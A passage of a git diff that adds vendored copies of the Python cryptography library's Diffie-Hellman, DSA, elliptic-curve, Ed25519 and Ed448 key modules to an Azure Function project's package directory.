+ + +import abc +import typing + +from cryptography.hazmat.primitives import _serialization + + +_MIN_MODULUS_SIZE = 512 + + +def generate_parameters( + generator: int, key_size: int, backend: typing.Any = None +) -> "DHParameters": + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_dh_parameters(generator, key_size) + + +class DHParameterNumbers: + def __init__(self, p: int, g: int, q: typing.Optional[int] = None) -> None: + if not isinstance(p, int) or not isinstance(g, int): + raise TypeError("p and g must be integers") + if q is not None and not isinstance(q, int): + raise TypeError("q must be integer or None") + + if g < 2: + raise ValueError("DH generator must be 2 or greater") + + if p.bit_length() < _MIN_MODULUS_SIZE: + raise ValueError( + "p (modulus) must be at least {}-bit".format(_MIN_MODULUS_SIZE) + ) + + self._p = p + self._g = g + self._q = q + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DHParameterNumbers): + return NotImplemented + + return ( + self._p == other._p and self._g == other._g and self._q == other._q + ) + + def parameters(self, backend: typing.Any = None) -> "DHParameters": + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dh_parameter_numbers(self) + + @property + def p(self) -> int: + return self._p + + @property + def g(self) -> int: + return self._g + + @property + def q(self) -> typing.Optional[int]: + return self._q + + +class DHPublicNumbers: + def __init__(self, y: int, parameter_numbers: DHParameterNumbers) -> None: + if not isinstance(y, int): + raise TypeError("y must be an integer.") + + if not isinstance(parameter_numbers, DHParameterNumbers): + raise TypeError( + "parameters must be an instance of DHParameterNumbers." + ) + + self._y = y + self._parameter_numbers = parameter_numbers + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DHPublicNumbers): + return NotImplemented + + return ( + self._y == other._y + and self._parameter_numbers == other._parameter_numbers + ) + + def public_key(self, backend: typing.Any = None) -> "DHPublicKey": + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dh_public_numbers(self) + + @property + def y(self) -> int: + return self._y + + @property + def parameter_numbers(self) -> DHParameterNumbers: + return self._parameter_numbers + + +class DHPrivateNumbers: + def __init__(self, x: int, public_numbers: DHPublicNumbers) -> None: + if not isinstance(x, int): + raise TypeError("x must be an integer.") + + if not isinstance(public_numbers, DHPublicNumbers): + raise TypeError( + "public_numbers must be an instance of " "DHPublicNumbers." + ) + + self._x = x + self._public_numbers = public_numbers + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DHPrivateNumbers): + return NotImplemented + + return ( + self._x == other._x + and self._public_numbers == other._public_numbers + ) + + def private_key(self, backend: typing.Any = None) -> "DHPrivateKey": + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dh_private_numbers(self) + + @property + def public_numbers(self) -> DHPublicNumbers: + return self._public_numbers + + @property + def x(self) -> int: + return self._x + + +class DHParameters(metaclass=abc.ABCMeta): + @abc.abstractmethod + def generate_private_key(self) -> "DHPrivateKey": + """ + Generates and returns a DHPrivateKey. 
+ """ + + @abc.abstractmethod + def parameter_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.ParameterFormat, + ) -> bytes: + """ + Returns the parameters serialized as bytes. + """ + + @abc.abstractmethod + def parameter_numbers(self) -> DHParameterNumbers: + """ + Returns a DHParameterNumbers. + """ + + +DHParametersWithSerialization = DHParameters + + +class DHPublicKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def parameters(self) -> DHParameters: + """ + The DHParameters object associated with this public key. + """ + + @abc.abstractmethod + def public_numbers(self) -> DHPublicNumbers: + """ + Returns a DHPublicNumbers. + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +DHPublicKeyWithSerialization = DHPublicKey + + +class DHPrivateKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def public_key(self) -> DHPublicKey: + """ + The DHPublicKey associated with this private key. + """ + + @abc.abstractmethod + def parameters(self) -> DHParameters: + """ + The DHParameters object associated with this private key. + """ + + @abc.abstractmethod + def exchange(self, peer_public_key: DHPublicKey) -> bytes: + """ + Given peer's DHPublicKey, carry out the key exchange and + return shared key as bytes. + """ + + @abc.abstractmethod + def private_numbers(self) -> DHPrivateNumbers: + """ + Returns a DHPrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +DHPrivateKeyWithSerialization = DHPrivateKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dsa.py new file mode 100644 index 0000000..6a682d2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dsa.py @@ -0,0 +1,288 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.hazmat.primitives import _serialization, hashes +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) + + +class DSAParameters(metaclass=abc.ABCMeta): + @abc.abstractmethod + def generate_private_key(self) -> "DSAPrivateKey": + """ + Generates and returns a DSAPrivateKey. + """ + + @abc.abstractmethod + def parameter_numbers(self) -> "DSAParameterNumbers": + """ + Returns a DSAParameterNumbers. + """ + + +DSAParametersWithNumbers = DSAParameters + + +class DSAPrivateKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def public_key(self) -> "DSAPublicKey": + """ + The DSAPublicKey associated with this private key. 
+ """ + + @abc.abstractmethod + def parameters(self) -> DSAParameters: + """ + The DSAParameters object associated with this private key. + """ + + @abc.abstractmethod + def sign( + self, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + """ + Signs the data + """ + + @abc.abstractmethod + def private_numbers(self) -> "DSAPrivateNumbers": + """ + Returns a DSAPrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +DSAPrivateKeyWithSerialization = DSAPrivateKey + + +class DSAPublicKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def parameters(self) -> DSAParameters: + """ + The DSAParameters object associated with this public key. + """ + + @abc.abstractmethod + def public_numbers(self) -> "DSAPublicNumbers": + """ + Returns a DSAPublicNumbers. + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + @abc.abstractmethod + def verify( + self, + signature: bytes, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + """ + Verifies the signature of the data. + """ + + +DSAPublicKeyWithSerialization = DSAPublicKey + + +class DSAParameterNumbers: + def __init__(self, p: int, q: int, g: int): + if ( + not isinstance(p, int) + or not isinstance(q, int) + or not isinstance(g, int) + ): + raise TypeError( + "DSAParameterNumbers p, q, and g arguments must be integers." + ) + + self._p = p + self._q = q + self._g = g + + @property + def p(self) -> int: + return self._p + + @property + def q(self) -> int: + return self._q + + @property + def g(self) -> int: + return self._g + + def parameters(self, backend: typing.Any = None) -> DSAParameters: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dsa_parameter_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DSAParameterNumbers): + return NotImplemented + + return self.p == other.p and self.q == other.q and self.g == other.g + + def __repr__(self) -> str: + return ( + "".format(self=self) + ) + + +class DSAPublicNumbers: + def __init__(self, y: int, parameter_numbers: DSAParameterNumbers): + if not isinstance(y, int): + raise TypeError("DSAPublicNumbers y argument must be an integer.") + + if not isinstance(parameter_numbers, DSAParameterNumbers): + raise TypeError( + "parameter_numbers must be a DSAParameterNumbers instance." 
+ ) + + self._y = y + self._parameter_numbers = parameter_numbers + + @property + def y(self) -> int: + return self._y + + @property + def parameter_numbers(self) -> DSAParameterNumbers: + return self._parameter_numbers + + def public_key(self, backend: typing.Any = None) -> DSAPublicKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dsa_public_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DSAPublicNumbers): + return NotImplemented + + return ( + self.y == other.y + and self.parameter_numbers == other.parameter_numbers + ) + + def __repr__(self) -> str: + return ( + "".format(self=self) + ) + + +class DSAPrivateNumbers: + def __init__(self, x: int, public_numbers: DSAPublicNumbers): + if not isinstance(x, int): + raise TypeError("DSAPrivateNumbers x argument must be an integer.") + + if not isinstance(public_numbers, DSAPublicNumbers): + raise TypeError( + "public_numbers must be a DSAPublicNumbers instance." + ) + self._public_numbers = public_numbers + self._x = x + + @property + def x(self) -> int: + return self._x + + @property + def public_numbers(self) -> DSAPublicNumbers: + return self._public_numbers + + def private_key(self, backend: typing.Any = None) -> DSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dsa_private_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DSAPrivateNumbers): + return NotImplemented + + return ( + self.x == other.x and self.public_numbers == other.public_numbers + ) + + +def generate_parameters( + key_size: int, backend: typing.Any = None +) -> DSAParameters: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_dsa_parameters(key_size) + + +def generate_private_key( + key_size: int, backend: typing.Any = None +) -> DSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_dsa_private_key_and_parameters(key_size) + + +def _check_dsa_parameters(parameters: DSAParameterNumbers) -> None: + if parameters.p.bit_length() not in [1024, 2048, 3072, 4096]: + raise ValueError( + "p must be exactly 1024, 2048, 3072, or 4096 bits long" + ) + if parameters.q.bit_length() not in [160, 224, 256]: + raise ValueError("q must be exactly 160, 224, or 256 bits long") + + if not (1 < parameters.g < parameters.p): + raise ValueError("g, p don't satisfy 1 < g < p.") + + +def _check_dsa_private_numbers(numbers: DSAPrivateNumbers) -> None: + parameters = numbers.public_numbers.parameter_numbers + _check_dsa_parameters(parameters) + if numbers.x <= 0 or numbers.x >= parameters.q: + raise ValueError("x must be > 0 and < q.") + + if numbers.public_numbers.y != pow(parameters.g, numbers.x, parameters.p): + raise ValueError("y must be equal to (g ** x % p).") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ec.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ec.py new file mode 100644 index 0000000..7179883 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ec.py @@ -0,0 +1,523 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. 
See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing +import warnings + +from cryptography import utils +from cryptography.hazmat._oid import ObjectIdentifier +from cryptography.hazmat.primitives import _serialization, hashes +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) + + +class EllipticCurveOID: + SECP192R1 = ObjectIdentifier("1.2.840.10045.3.1.1") + SECP224R1 = ObjectIdentifier("1.3.132.0.33") + SECP256K1 = ObjectIdentifier("1.3.132.0.10") + SECP256R1 = ObjectIdentifier("1.2.840.10045.3.1.7") + SECP384R1 = ObjectIdentifier("1.3.132.0.34") + SECP521R1 = ObjectIdentifier("1.3.132.0.35") + BRAINPOOLP256R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.7") + BRAINPOOLP384R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.11") + BRAINPOOLP512R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.13") + SECT163K1 = ObjectIdentifier("1.3.132.0.1") + SECT163R2 = ObjectIdentifier("1.3.132.0.15") + SECT233K1 = ObjectIdentifier("1.3.132.0.26") + SECT233R1 = ObjectIdentifier("1.3.132.0.27") + SECT283K1 = ObjectIdentifier("1.3.132.0.16") + SECT283R1 = ObjectIdentifier("1.3.132.0.17") + SECT409K1 = ObjectIdentifier("1.3.132.0.36") + SECT409R1 = ObjectIdentifier("1.3.132.0.37") + SECT571K1 = ObjectIdentifier("1.3.132.0.38") + SECT571R1 = ObjectIdentifier("1.3.132.0.39") + + +class EllipticCurve(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + The name of the curve. e.g. secp256r1. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + Bit size of a secret scalar for the curve. + """ + + +class EllipticCurveSignatureAlgorithm(metaclass=abc.ABCMeta): + @abc.abstractproperty + def algorithm( + self, + ) -> typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm]: + """ + The digest algorithm used with this signature. + """ + + +class EllipticCurvePrivateKey(metaclass=abc.ABCMeta): + @abc.abstractmethod + def exchange( + self, algorithm: "ECDH", peer_public_key: "EllipticCurvePublicKey" + ) -> bytes: + """ + Performs a key exchange operation using the provided algorithm with the + provided peer's public key. + """ + + @abc.abstractmethod + def public_key(self) -> "EllipticCurvePublicKey": + """ + The EllipticCurvePublicKey for this private key. + """ + + @abc.abstractproperty + def curve(self) -> EllipticCurve: + """ + The EllipticCurve that this key is on. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + Bit size of a secret scalar for the curve. + """ + + @abc.abstractmethod + def sign( + self, + data: bytes, + signature_algorithm: EllipticCurveSignatureAlgorithm, + ) -> bytes: + """ + Signs the data + """ + + @abc.abstractmethod + def private_numbers(self) -> "EllipticCurvePrivateNumbers": + """ + Returns an EllipticCurvePrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +EllipticCurvePrivateKeyWithSerialization = EllipticCurvePrivateKey + + +class EllipticCurvePublicKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def curve(self) -> EllipticCurve: + """ + The EllipticCurve that this key is on. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + Bit size of a secret scalar for the curve. 
+ """ + + @abc.abstractmethod + def public_numbers(self) -> "EllipticCurvePublicNumbers": + """ + Returns an EllipticCurvePublicNumbers. + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + @abc.abstractmethod + def verify( + self, + signature: bytes, + data: bytes, + signature_algorithm: EllipticCurveSignatureAlgorithm, + ) -> None: + """ + Verifies the signature of the data. + """ + + @classmethod + def from_encoded_point( + cls, curve: EllipticCurve, data: bytes + ) -> "EllipticCurvePublicKey": + utils._check_bytes("data", data) + + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must be an EllipticCurve instance") + + if len(data) == 0: + raise ValueError("data must not be an empty byte string") + + if data[0] not in [0x02, 0x03, 0x04]: + raise ValueError("Unsupported elliptic curve point type") + + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.load_elliptic_curve_public_bytes(curve, data) + + +EllipticCurvePublicKeyWithSerialization = EllipticCurvePublicKey + + +class SECT571R1(EllipticCurve): + name = "sect571r1" + key_size = 570 + + +class SECT409R1(EllipticCurve): + name = "sect409r1" + key_size = 409 + + +class SECT283R1(EllipticCurve): + name = "sect283r1" + key_size = 283 + + +class SECT233R1(EllipticCurve): + name = "sect233r1" + key_size = 233 + + +class SECT163R2(EllipticCurve): + name = "sect163r2" + key_size = 163 + + +class SECT571K1(EllipticCurve): + name = "sect571k1" + key_size = 571 + + +class SECT409K1(EllipticCurve): + name = "sect409k1" + key_size = 409 + + +class SECT283K1(EllipticCurve): + name = "sect283k1" + key_size = 283 + + +class SECT233K1(EllipticCurve): + name = "sect233k1" + key_size = 233 + + +class SECT163K1(EllipticCurve): + name = "sect163k1" + key_size = 163 + + +class SECP521R1(EllipticCurve): + name = "secp521r1" + key_size = 521 + + +class SECP384R1(EllipticCurve): + name = "secp384r1" + key_size = 384 + + +class SECP256R1(EllipticCurve): + name = "secp256r1" + key_size = 256 + + +class SECP256K1(EllipticCurve): + name = "secp256k1" + key_size = 256 + + +class SECP224R1(EllipticCurve): + name = "secp224r1" + key_size = 224 + + +class SECP192R1(EllipticCurve): + name = "secp192r1" + key_size = 192 + + +class BrainpoolP256R1(EllipticCurve): + name = "brainpoolP256r1" + key_size = 256 + + +class BrainpoolP384R1(EllipticCurve): + name = "brainpoolP384r1" + key_size = 384 + + +class BrainpoolP512R1(EllipticCurve): + name = "brainpoolP512r1" + key_size = 512 + + +_CURVE_TYPES: typing.Dict[str, typing.Type[EllipticCurve]] = { + "prime192v1": SECP192R1, + "prime256v1": SECP256R1, + "secp192r1": SECP192R1, + "secp224r1": SECP224R1, + "secp256r1": SECP256R1, + "secp384r1": SECP384R1, + "secp521r1": SECP521R1, + "secp256k1": SECP256K1, + "sect163k1": SECT163K1, + "sect233k1": SECT233K1, + "sect283k1": SECT283K1, + "sect409k1": SECT409K1, + "sect571k1": SECT571K1, + "sect163r2": SECT163R2, + "sect233r1": SECT233R1, + "sect283r1": SECT283R1, + "sect409r1": SECT409R1, + "sect571r1": SECT571R1, + "brainpoolP256r1": BrainpoolP256R1, + "brainpoolP384r1": BrainpoolP384R1, + "brainpoolP512r1": BrainpoolP512R1, +} + + +class ECDSA(EllipticCurveSignatureAlgorithm): + def __init__( + self, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ): + self._algorithm = algorithm + + @property + def algorithm( + self, + ) -> 
typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm]: + return self._algorithm + + +def generate_private_key( + curve: EllipticCurve, backend: typing.Any = None +) -> EllipticCurvePrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_elliptic_curve_private_key(curve) + + +def derive_private_key( + private_value: int, + curve: EllipticCurve, + backend: typing.Any = None, +) -> EllipticCurvePrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + if not isinstance(private_value, int): + raise TypeError("private_value must be an integer type.") + + if private_value <= 0: + raise ValueError("private_value must be a positive integer.") + + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must provide the EllipticCurve interface.") + + return ossl.derive_elliptic_curve_private_key(private_value, curve) + + +class EllipticCurvePublicNumbers: + def __init__(self, x: int, y: int, curve: EllipticCurve): + if not isinstance(x, int) or not isinstance(y, int): + raise TypeError("x and y must be integers.") + + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must provide the EllipticCurve interface.") + + self._y = y + self._x = x + self._curve = curve + + def public_key(self, backend: typing.Any = None) -> EllipticCurvePublicKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_elliptic_curve_public_numbers(self) + + def encode_point(self) -> bytes: + warnings.warn( + "encode_point has been deprecated on EllipticCurvePublicNumbers" + " and will be removed in a future version. Please use " + "EllipticCurvePublicKey.public_bytes to obtain both " + "compressed and uncompressed point encoding.", + utils.PersistentlyDeprecated2019, + stacklevel=2, + ) + # key_size is in bits. Convert to bytes and round up + byte_length = (self.curve.key_size + 7) // 8 + return ( + b"\x04" + + utils.int_to_bytes(self.x, byte_length) + + utils.int_to_bytes(self.y, byte_length) + ) + + @classmethod + def from_encoded_point( + cls, curve: EllipticCurve, data: bytes + ) -> "EllipticCurvePublicNumbers": + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must be an EllipticCurve instance") + + warnings.warn( + "Support for unsafe construction of public numbers from " + "encoded data will be removed in a future version. " + "Please use EllipticCurvePublicKey.from_encoded_point", + utils.PersistentlyDeprecated2019, + stacklevel=2, + ) + + if data.startswith(b"\x04"): + # key_size is in bits. 
Convert to bytes and round up
+            byte_length = (curve.key_size + 7) // 8
+            if len(data) == 2 * byte_length + 1:
+                x = int.from_bytes(data[1 : byte_length + 1], "big")
+                y = int.from_bytes(data[byte_length + 1 :], "big")
+                return cls(x, y, curve)
+            else:
+                raise ValueError("Invalid elliptic curve point data length")
+        else:
+            raise ValueError("Unsupported elliptic curve point type")
+
+    @property
+    def curve(self) -> EllipticCurve:
+        return self._curve
+
+    @property
+    def x(self) -> int:
+        return self._x
+
+    @property
+    def y(self) -> int:
+        return self._y
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, EllipticCurvePublicNumbers):
+            return NotImplemented
+
+        return (
+            self.x == other.x
+            and self.y == other.y
+            and self.curve.name == other.curve.name
+            and self.curve.key_size == other.curve.key_size
+        )
+
+    def __hash__(self) -> int:
+        return hash((self.x, self.y, self.curve.name, self.curve.key_size))
+
+    def __repr__(self) -> str:
+        return (
+            "<EllipticCurvePublicNumbers(curve={0.curve.name}, x={0.x}, "
+            "y={0.y}>".format(self)
+        )
+
+
+class EllipticCurvePrivateNumbers:
+    def __init__(
+        self, private_value: int, public_numbers: EllipticCurvePublicNumbers
+    ):
+        if not isinstance(private_value, int):
+            raise TypeError("private_value must be an integer.")
+
+        if not isinstance(public_numbers, EllipticCurvePublicNumbers):
+            raise TypeError(
+                "public_numbers must be an EllipticCurvePublicNumbers "
+                "instance."
+            )
+
+        self._private_value = private_value
+        self._public_numbers = public_numbers
+
+    def private_key(
+        self, backend: typing.Any = None
+    ) -> EllipticCurvePrivateKey:
+        from cryptography.hazmat.backends.openssl.backend import (
+            backend as ossl,
+        )
+
+        return ossl.load_elliptic_curve_private_numbers(self)
+
+    @property
+    def private_value(self) -> int:
+        return self._private_value
+
+    @property
+    def public_numbers(self) -> EllipticCurvePublicNumbers:
+        return self._public_numbers
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, EllipticCurvePrivateNumbers):
+            return NotImplemented
+
+        return (
+            self.private_value == other.private_value
+            and self.public_numbers == other.public_numbers
+        )
+
+    def __hash__(self) -> int:
+        return hash((self.private_value, self.public_numbers))
+
+
+class ECDH:
+    pass
+
+
+_OID_TO_CURVE = {
+    EllipticCurveOID.SECP192R1: SECP192R1,
+    EllipticCurveOID.SECP224R1: SECP224R1,
+    EllipticCurveOID.SECP256K1: SECP256K1,
+    EllipticCurveOID.SECP256R1: SECP256R1,
+    EllipticCurveOID.SECP384R1: SECP384R1,
+    EllipticCurveOID.SECP521R1: SECP521R1,
+    EllipticCurveOID.BRAINPOOLP256R1: BrainpoolP256R1,
+    EllipticCurveOID.BRAINPOOLP384R1: BrainpoolP384R1,
+    EllipticCurveOID.BRAINPOOLP512R1: BrainpoolP512R1,
+    EllipticCurveOID.SECT163K1: SECT163K1,
+    EllipticCurveOID.SECT163R2: SECT163R2,
+    EllipticCurveOID.SECT233K1: SECT233K1,
+    EllipticCurveOID.SECT233R1: SECT233R1,
+    EllipticCurveOID.SECT283K1: SECT283K1,
+    EllipticCurveOID.SECT283R1: SECT283R1,
+    EllipticCurveOID.SECT409K1: SECT409K1,
+    EllipticCurveOID.SECT409R1: SECT409R1,
+    EllipticCurveOID.SECT571K1: SECT571K1,
+    EllipticCurveOID.SECT571R1: SECT571R1,
+}
+
+
+def get_curve_for_oid(oid: ObjectIdentifier) -> typing.Type[EllipticCurve]:
+    try:
+        return _OID_TO_CURVE[oid]
+    except KeyError:
+        raise LookupError(
+            "The provided object identifier has no matching elliptic "
+            "curve class"
+        )
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed25519.py
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed25519.py new file mode 100644 index 0000000..cef025c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed25519.py @@ -0,0 +1,92 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +_ED25519_KEY_SIZE = 32 +_ED25519_SIG_SIZE = 64 + + +class Ed25519PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "Ed25519PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed25519_supported(): + raise UnsupportedAlgorithm( + "ed25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed25519_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def verify(self, signature: bytes, data: bytes) -> None: + """ + Verify the signature. + """ + + +class Ed25519PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "Ed25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed25519_supported(): + raise UnsupportedAlgorithm( + "ed25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed25519_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "Ed25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed25519_supported(): + raise UnsupportedAlgorithm( + "ed25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed25519_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> Ed25519PublicKey: + """ + The Ed25519PublicKey derived from the private key. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ + + @abc.abstractmethod + def sign(self, data: bytes) -> bytes: + """ + Signs the data. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed448.py new file mode 100644 index 0000000..0fdeeec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed448.py @@ -0,0 +1,87 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
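The Ed25519 interfaces above (and the Ed448 ones that follow, which mirror them method for method) reduce to a generate/sign/verify triple. A short sketch of the standard documented usage (the payload bytes are illustrative):

    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import (
        Ed25519PrivateKey,
    )

    key = Ed25519PrivateKey.generate()
    signature = key.sign(b"payload")  # 64 bytes, per _ED25519_SIG_SIZE above
    try:
        # verify() returns None on success and raises on mismatch
        key.public_key().verify(signature, b"payload")
    except InvalidSignature:
        raise SystemExit("signature did not match the data or key")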
+ + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +class Ed448PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "Ed448PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed448_supported(): + raise UnsupportedAlgorithm( + "ed448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed448_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def verify(self, signature: bytes, data: bytes) -> None: + """ + Verify the signature. + """ + + +class Ed448PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "Ed448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed448_supported(): + raise UnsupportedAlgorithm( + "ed448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + return backend.ed448_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "Ed448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed448_supported(): + raise UnsupportedAlgorithm( + "ed448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed448_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> Ed448PublicKey: + """ + The Ed448PublicKey derived from the private key. + """ + + @abc.abstractmethod + def sign(self, data: bytes) -> bytes: + """ + Signs the data. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/padding.py 